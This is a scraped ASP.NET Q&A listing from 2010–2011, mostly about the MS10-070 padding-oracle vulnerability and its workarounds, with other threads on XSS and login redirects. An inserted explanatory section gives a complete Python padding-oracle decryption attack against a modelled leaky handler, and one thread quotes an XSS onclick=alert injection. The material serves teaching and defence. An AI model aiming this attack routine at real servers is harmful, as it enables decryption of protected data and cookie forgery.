Security Vulnerability (Cryptographic Oracles) - Why Html Redirect For Pre 3.5 SP1
Sep 21, 2010
Why does the recent ASP.NET security vulnerability specify an html error page to redirect to pre ASP.NET 3.5 SP1 but an aspx page for later versions?
View 1 Replies
Similar Messages:
Sep 20, 2010
Just reading about this ASP.NET security vulnerability. Just wondering if this could be used to attack a WCF service hosted under IIS to get to its web.config or if it's a pure ASP.NET vulnerability.
View 3 Replies
Sep 23, 2010
This question is somewhat of a follow up to How serious is this new ASP.NET security vulnerability and how can I workaround it? So if my question seems to be broken read over this question and its accepted solution first and then take that into the context of my question.

Can someone explain why returning the same error page and same status code for custom errors matters? I find this to be immaterial especially if this is advocated as part of the work around to it. Isn't it just as easy for the script/application to execute this attack and not specifically care whether or not it gets a http status code and more on the outcome? I.e. doing this 4000 times you get redirected to an error page where on 4001 you stay on the same page because it didn't invalidate the padding?

I see why adding the delay to the error page is somewhat relevant but doesn't this also just add another layer to fool the script into thinking the site is an invalid target? What could be done to prevent this if the script takes into account that since the site is asp.net it's running the AES encryption that it ignores the timing of error pages and watches the redirection or lack of redirection as the response vector? If a script does this will that mean there's NO WAY to stop it?

Edit: I accept the timing attack reduction but the error page part is what really seems bogus. This attack vector puts their data into viewstate. There's only 2 cases. Pass. Fail.

Either Fail, they're on a page and the viewstate does not contain their data. No matter what you do here there is no way to remove the fail case because the page just will never contain their inserted data unless they successfully cracked the key. This is why I can't justify the custom errors usage having ANY EFFECT AT ALL. Or Pass, they're on a page and the viewstate contains their inserted data.

Summary of this vulnerability

The cipher key from the WebResource.axd / ScriptResource.axd is taken and the first guess of the validation key is used to generate a value of potential key with the ciphered text. This value is passed to the WebResource.axd / ScriptResource.axd; at this point if the decryption key was guessed correctly their response will be accepted but since the data is garbage that it's looking for the WebResource.axd / ScriptResource.axd will return a 404 error. If the decryption key was not successfully guessed it will get a 500 error for the padding invalid exception. At this point the attack application knows to increment the potential decryption key value and try again, repeating until it finds the first successful 404 from the WebResource.axd / ScriptResource.axd.
View 4 Replies
Jan 5, 2011
2nd in an occasional series:
Here's the first one
Is CAT.NET correct that the following is a genuine vulnerability in ASP.NET or is it a false positive?
var myInt = Int32.Parse(txtUserInput.Text);
Response.Redirect(string.Format("myPage.aspx?myId={0}", myInt));
CAT.NET is reporting this as a redirect vulnerability needing remediation via encoding myInt.
View 3 Replies
Mar 11, 2010
I am trying to create a strong name for an assembly by giving the code below:
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyKeyFile(@"Users\ABC\Documents\Visual Studio 2008\Projects\codeaccesssecurity\codeaccesssecurity\bin\Debug\ABC.snk")]
[assembly: AssemblyKeyName("")]
When I am compiling the project I am getting this error:
Error 1 Cryptographic failure while signing assembly 'C:\Users\ABC\Documents\Visual Studio 2008\Projects\codeaccesssecurity\codeaccesssecurity\obj\Release\codeaccesssecurity.exe' -- 'Error reading key file 'Users\ABC\Documents\Visual Studio 2008\Projects\codeaccesssecurity\codeaccesssecurity\bin\Debug\ABC.snk'
-- The system cannot find the path specified.'
View 1 Replies
Sep 20, 2010
In Scott Guthrie's blog on the ASP.NET Security vulnerability noted here he says that for ASP.NET 3.5 SP1+ the following attribute should be set in the custom errors section
redirectMode="ResponseRewrite"
What is the significance of this in relation to the vulnerability and why only 3.5 SP1 and above?
View 2 Replies
Sep 15, 2010
I've just read on the net about a newly discovered security vulnerability in ASP.NET. You can read the details here. The problem lies in the way that ASP.NET implements the AES encryption algorithm to protect the integrity of the cookies these applications generate to store information during user sessions. This is a bit vague, but here is a more frightening part: The first stage of the attack takes a few thousand requests, but once it succeeds and the attacker gets the secret keys, it's totally stealthy. The cryptographic knowledge required is very basic.

All in all, I'm not familiar enough with the security/cryptography subject to know if this is really that serious. So, should all ASP.NET developers fear this technique that can own any ASP.NET website in seconds or what? How does this issue affect the average ASP.NET developer? Does it affect us at all?

In real life, what are the consequences of this vulnerability? And, finally: is there some workaround that prevents this vulnerability?

EDIT: I'd like to summarize the responses I got so far. So, this is basically a "padding oracle" type of attack. @Sri provided a great explanation about what this type of attack means. Here is a shocking video about the issue! About the seriousness of this vulnerability: Yes, it is indeed serious. It lets the attacker get to know the machine key of an application. Thus, he can do some very unwanted things.

In possession of the app's machine key, the attacker can decrypt authentication cookies.

Even worse than that, he can generate authentication cookies with the name of any user. Thus, he can appear as anyone on the site. The application is unable to differentiate between you or the hacker who generated an authentication cookie with your name for himself. It also lets him decrypt (and also generate) session cookies, although this is not as dangerous as the previous one. Not so serious: He can decrypt the encrypted ViewState of pages. (If you use ViewState to store confidential data, you shouldn't do this anyway!) Quite unexpected: With the knowledge of the machine key, the attacker can download any arbitrary file from your web application, even those that normally can't be downloaded! (Including Web.Config, etc.)

Here is a bunch of good practices I got that don't solve the issue but help improve the general security of a web application.
You can encrypt sensitive data with Protected Configuration
Use HTTP Only cookies
Prevent DoS attacks

Now, let's focus on this issue.
Scott Guthrie published an entry about it on his blog
ScottGu's FAQ blog post about the vulnerability
ScottGu's update on the vulnerability
Microsoft has a security advisory about it
Understanding the vulnerability
Additional information about the vulnerability

The solution
Enable customErrors and make a single error page to which all errors are redirected. Yes, even 404s. (ScottGu said that differentiating between 404s and 500s is essential for this attack.) Also, into your Application_Error or Error.aspx put some code that makes a random delay. (Generate a random number, and use Thread.Sleep to sleep for that long.) This will make it impossible for the attacker to decide what exactly happened on your server. Some people recommended switching back to 3DES. In theory, if you don't use AES, you don't encounter the security weakness in the AES implementation. As it turns out, this is not recommended at all. Some other
View 12 Replies
Sep 29, 2010
Since installing the security patch for the ASP.NET Padding Oracle vulnerability any user that was keeping themselves logged in to our site is getting error messages when hitting any page.
The errors logged on the server are
System.Web.UI.ViewStateException: Invalid viewstate.
Client IP: xxx.xxx.xxx.xxx
Port: 55796
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
ViewState: l4nsXEvWcOwlDpmdbxw916bpHoPiqdBP7Syb+zCQAv44xv/r3oLtETKTL28/Gts6
Referer:
Path: /product/4795/fender-usa-deluxe-stratocaster-mn-olympic-white-pearl
With custom errors switched off a user sees the following information
Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Web.HttpException: Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace: [ViewStateException: Invalid viewstate.
Client IP: xxx.xxx.xxx.xxx
Port: 3588
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
ViewState: s0toPCu7bxkB7a3G+KTxawY3ILf1qunZyIqNBKg8xSoqY2BkWIUCJAHKFKo2RnJw
Referer:
Path: /]
[HttpException (0x80004005): Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.]
System.Web.UI.ViewStateException.ThrowError(Exception inner, String persistedState, String errorPageMessage, Boolean macValidationError) +118
System.Web.UI.ViewStateException.ThrowMacValidationError(Exception inner, String persistedState) +13
System.Web.UI.ObjectStateFormatter.Deserialize(String inputString) +238
System.Web.UI.ObjectStateFormatter.System.Web.UI.IStateFormatter.Deserialize(String serializedState) +5
System.Web.Mvc.AntiForgeryDataSerializer.Deserialize(String serializedToken) +90
to delete all cookies and log back in, but obviously an average user, won't know to do this and I'm worried they will just think our site is broken.
View 3 Replies
Apr 16, 2010
My application is running under asp.net 2.0 and in IIS 5.0 (Windows XP). In my machine.config, I have the following setting
[code]...
whenever i go to my default.aspx page, it seems it doesn't redirect to login.aspx.
View 5 Replies
Dec 2, 2010
We have developed a small method that pulls a cryptographic key from a signed xml document and then checks the signature using the SignedXml.CheckSignature method.
When run from a command line app the key validates properly. However as soon as I call it from a web app it stops working. Anybody know what could be happening?:
// Verify the signature of an XML file against an asymmetric
// algorithm and return the result.
// XmlDocument Doc, RSA Key
public static Boolean VerifyLicenceFile(string xmlLicFilePathArg)
{
    bool isVerified = false;
    ....
View 1 Replies
Mar 25, 2010
We recently discovered that our web app was vulnerable to cross site scripting (XSS) attacks. We managed to manipulate our inputs to produce the following HTML:
[Code]....
Which executes an alert window when clicked.
After HTMLEncoding using the AntiXSS the web app successfully encodes the output to look like this:
<a href="javascript:__doPostBack('ctl00$ContentPlaceHolder1$CtlSearchList1$CtlListView1$DataGrid1$ctl03$ctl00','')">'); onclick=alert('This is an XSS vulnerability. An attacker could do anything here (redirect to another website, virus etc)');('.txt</a>
but the alert window still fires! What am I doing wrong?
View 3 Replies
Feb 25, 2011
Our asp.net 2.0 app encountered the following error:
This implementation is not part of the Windows Platform FIPS validated cryptographic algorithms. After adding the following in web.config -> <system.web> section:
<machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" validation="3DES" decryption="3DES"/>
The error occurs in those pages that use AJAX.
View 1 Replies
Jan 17, 2010
How can i redirect the Output of a View to html or string or PDF?
[Code]....
I want to redirect that action to a pdf but all code I have found is in C# and I can't get it to work.
View 3 Replies
Jan 22, 2011
I am struggling a little creating a basic redirect page in ASP.Net but ensuring the HTML is loaded first. I tried putting Response.Redirect in the page load event but that fires before the HTML is fully loaded. Been trying to use a timer but it's just not doing anything. I need the HTML to load before the redirect occurs as I have a statcounter script installed to log the visit before it redirects off my site.
View 4 Replies
Mar 22, 2011
I'm using Session to pass data from one page to another. The data contains HTML and when I display it in the other page, I see that it's different. This is how I put data in Session:
Session["omschrijving"] = Server.UrlEncode(lblOmschrijving.Text);
ftbOmschrijving.Text = (string)Session["omschrijving"];
View 5 Replies
Dec 24, 2010
I have a problem with trying to make some redirections from an old HTML page which was reading some parameters from the URL to feed some flash components to a new ASPX page.
The issue is that the page URLs are of the form: [URL] and that needs to redirect to something like: [URL]
There are several different values following the # but in essence they are all the same html page. Other problem is that the values are not even passed in a query string.
I'm using Windows Server 2008, IIS 7 (not R2) and I have installed the URL Rewrite module but so far my rules have not worked.
View 1 Replies
Oct 29, 2010
Considering the recent ASP.NET vulnerability, what should I look for in my httphandlers that would cause such a padding oracle vulnerability?
Asked in another way... what did MSFT do wrong and what did they fix in their handlers?
View 2 Replies
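The attack argued about in several of these posts (the Sep 23 question on whether returning one error page matters, the Sep 20 question on redirectMode="ResponseRewrite", the Sep 15 summary, and this question about what the handlers did wrong), as an added example that is not code from the original page, from Microsoft or from ASP.NET: a CBC padding-oracle decryption run against a model of the resource handler. Everything in it is constructed for the example: the block cipher is a stand-in (a 4-round Feistel network with HMAC-SHA256 as the round function, used instead of AES so that only the standard library is needed; the attack never looks inside the cipher, only at CBC chaining and the PKCS#7 padding check), the handler and its 500-versus-404 split model the leaky behaviour described in the posts, and the sample plaintext is made up. With the leaky handler the attacker recovers the plaintext without ever holding the key, using nothing but the difference between the two responses; against a handler that answers every failure with the same page and status, the same code cannot tell a good guess from a bad one and gives up.

```python
import hashlib
import hmac
import os

BLOCK = 16


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Stand-in 128-bit block cipher: 4-round Feistel network, HMAC-SHA256 round function
# (assumption: it replaces AES so the example needs only the standard library).
def _round(key, i, half):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def encrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def decrypt_block(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("padding invalid")  # what the leaky handler turned into a 500
    return data[:-n]


def cbc_encrypt(key, iv, plaintext):
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = encrypt_block(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        out.append(_xor(decrypt_block(key, ciphertext[i:i + BLOCK]), prev))
        prev = ciphertext[i:i + BLOCK]
    return b"".join(out)


def make_handler(key, leaky):
    # Constructed model of the resource handler. leaky: 500 on a padding error, 404 when
    # the padding is fine but the decrypted name matches nothing. Fixed: one custom error
    # response (same page, same status) whatever went wrong.
    def handler(iv, ciphertext):
        try:
            unpad(cbc_decrypt(key, iv, ciphertext))
        except ValueError:
            return 500 if leaky else 200
        return 404 if leaky else 200
    return handler


def attack_block(handler, prev, target):
    # Learn D_key(target) byte by byte from the end using only the handler's answers,
    # then XOR it with the real preceding block to get the plaintext.
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padval  # bytes already known now decrypt to padval
        hits = [g for g in range(256)
                if handler(bytes(forged[:pos]) + bytes([g]) + bytes(forged[pos + 1:]), target) != 500]
        if pos == BLOCK - 1:
            # "02 02", "03 03 03" ... are accepted too; for a genuine 01 the byte before
            # the last must not matter, so re-check each hit with that byte flipped.
            confirmed = []
            for g in hits:
                forged[pos], forged[pos - 1] = g, forged[pos - 1] ^ 0xFF
                if handler(bytes(forged), target) != 500:
                    confirmed.append(g)
                forged[pos - 1] ^= 0xFF
            hits = confirmed
        if len(hits) != 1:
            raise RuntimeError("no padding oracle: %d of 256 guesses accepted" % len(hits))
        inter[pos] = hits[0] ^ padval
    return _xor(inter, prev)


def attack(handler, iv, ciphertext):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return unpad(b"".join(attack_block(handler, blocks[i - 1], blocks[i])
                          for i in range(1, len(blocks))))


SAMPLE_SECRET = b"constructed sample: name the server encrypted into the URL"


def demo():
    key, iv = os.urandom(32), os.urandom(BLOCK)
    ciphertext = cbc_encrypt(key, iv, pad(SAMPLE_SECRET))
    recovered = attack(make_handler(key, leaky=True), iv, ciphertext)  # no key used
    try:
        attack(make_handler(key, leaky=False), iv, ciphertext)
        closed = False
    except RuntimeError:
        closed = True
    return recovered, closed
```

`demo()` returns the recovered plaintext and `True` for "the uniform error response closed the oracle". The byte-at-a-time loop is why the workaround in the other posts is about error pages at all: the attacker needs a yes/no answer to "was the padding valid?" for each of roughly 256 guesses per byte, and the attacker's own data never has to show up in ViewState or anywhere else, because the handler answers every query on its own. A server that returns one error page with one status code for every failure no longer supplies that answer, although response time can still leak it, which is what the random delay in the error page is for (this model does not simulate timing). The MS10-070 update itself went further than the workaround and, as its bulletin described, signed all data ASP.NET encrypts, so a modified ciphertext is rejected before it ever reaches the padding check.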
Jan 7, 2010
I have a login page. Once a user is authenticated they are redirected to another page, (called pg2). I don't want just anyone typing in the url and getting to pg2. If they are not authenticated I want them to redirect to login.aspx. To achieve this, I'm using this code below. But it's not working. I am using a nested master page and I don't know if this is causing the problem.
[Code]....
View 9 Replies
Feb 2, 2010
I am using ASP.Net's forms authentication, but do not want the default behavior of redirecting to a login page when a restricted area is accessed. Instead I would like to invoke a javascript JQuery dialog for the login on the current page, preventing the content behind from loading. My only issue is that by default the forms authentication wants to redirect. Is there a handler that I can hook into, or some other option to prevent the redirect?
View 3 Replies
Jan 12, 2010
I have a problem... if one user tries to go to a page where he isn't authorized, the application redirects him to the login page...
How can I redirect to another page, where I write "Access denied"?
View 2 Replies
Jul 6, 2010
Ok, I have been trying with this for many days now and read countless posts on this subject but I still cannot get it working.
I have created 2 roles and memberships one for admin and one for users, as you can guess I want to direct admins to a admin page and users to a user page. When a user logs on, it works fine, whether it's an admin or user, but they both present the home page, default.aspx
I know you have to have a redirecturl, to direct the user to the relevant page, either admin or user, but where and which webconfig would you put this in? I have seen in some post that you need a protected void or a role line in a webconfig file, but I have tried both these and countless other bits of code in different webconfig files. Before you ask about validation, I know this works as the user can log in, but just wont go to the relevant page.
Directory structure I have is as follows:
Account folder contains - ChangePassword.aspx, ChangePasswordSuccess.aspx, Login.aspx, Register.aspx, Web.config
Webconfig contains
[Code]....
Admin folder contains - default.aspx, Web.config
webconfig contains
[Code]....
Registered folder contains - default.aspx, Web.config
webconfig contains
[Code]....
View 17 Replies
Mar 10, 2010
I am currently having a spot of bother in something I'm trying to create. I want it so when a user who is in a certain role logs in they are directed to a certain page, and any other normal users are directed to another page.
I think I have this sorted via code but...
-The first time it will work, the 'admin' user will get directed to the appropriate page
-I then log out and log in as a normal user and get directed to the appropriate page
-then when i log out of that users account and back into the admin one i get directed to the normal users page instead.
-additional to this, I tried it on a different machine logging in as the admin user only to be redirected to the normal users page (is my session being stored somewhere?)
I've traced through the problem and the user name and password being submitted are what they should be, yet it skips the true part of my IF statement for being in that role.
Here is my code I am using on the login form:
[Code]....
-When stepping through I've seen it work and not work with the same values; I can't understand the logic of its inconsistency
the code i am using for the logout is (this is on my masterpage):
[Code]....
View 4 Replies
Mar 24, 2010
I'm no programmer. I am a student majoring in Business Information Systems. My capstone course requires me to develop a web-enabled database that will allow a company to track their projects. I have set it up this far using the 3.5 dynamic data page. My database is fine, however I need to set it up so that Admins can view the entire site and have the ability to edit, view, and delete items, and where users can only edit projects that they are assigned. Is what I'm looking to do possible?
View 4 Replies
Feb 1, 2010
I have the following web.config file in my MemberPages directory:
<configuration>
<system.web>
<authorization>
<allow roles="member" />
<deny users="*" />
</authorization>
</system.web>
</configuration>
If the User is a "member", he/she is allowed access to web pages in the MemberPages directory. Otherwise, he/she is denied access. The mechanism works. However, when the User is denied access, the following very unfriendly message appears:
Server Error in '/MyWebSite' Application.
The resource cannot be found.
Description: HTTP 404. The resource you are looking for (or one of its dependencies) could have been removed, had its name changed, or is temporarily unavailable. Please review the following URL and make sure that it is spelled correctly.
Requested URL: /MyWebSite/MemberPages/member_page.aspx
How can I redirect the User to a more friendly page if he/she is denied access?
View 2 Replies
Apr 26, 2010
I have a Menu with various Web Pages. As I click to navigate from one Page to another, at random but not often, when I click to open a Page it takes me back to my Login page where the user must enter the Name and Password again; it then opens the page, else it doesn't do anything and stays on the login screen. This doesn't occur on my local development test.
On my Pages' Page_Load event I have this code
If Not Me.User.Identity.IsAuthenticated Then
    Response.Redirect("~/Login.aspx")
End If
View 7 Replies